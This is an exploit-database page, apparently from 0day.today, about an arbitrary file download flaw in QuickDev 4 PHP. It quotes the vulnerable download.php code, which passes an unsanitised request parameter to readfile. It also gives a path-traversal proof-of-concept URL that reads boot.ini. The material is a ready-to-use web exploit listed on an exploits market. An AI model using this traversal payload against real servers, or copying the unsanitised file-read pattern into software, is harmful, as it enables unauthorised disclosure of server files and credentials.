[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

QuickDev 4 (download.php file) File Disclosure Vulnerability

Author
SirGod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5596
Category
web applications
Date add
02-08-2009
Platform
unsorted
============================================================
QuickDev 4 (download.php file) File Disclosure Vulnerability
============================================================


#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
#####################################################################################

[+] Download : http://sourceforge.net/projects/quickdev4php/files/

[+] Arbitrary File Download

 - Vulnerable code in download.php

--------------------------------------------------------------------------

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();

--------------------------------------------------------------------------

 - PoC

   http://127.0.0.1/download.php?file=../../../../../../boot.ini

#####################################################################################




#  0day.today [2024-12-26]  #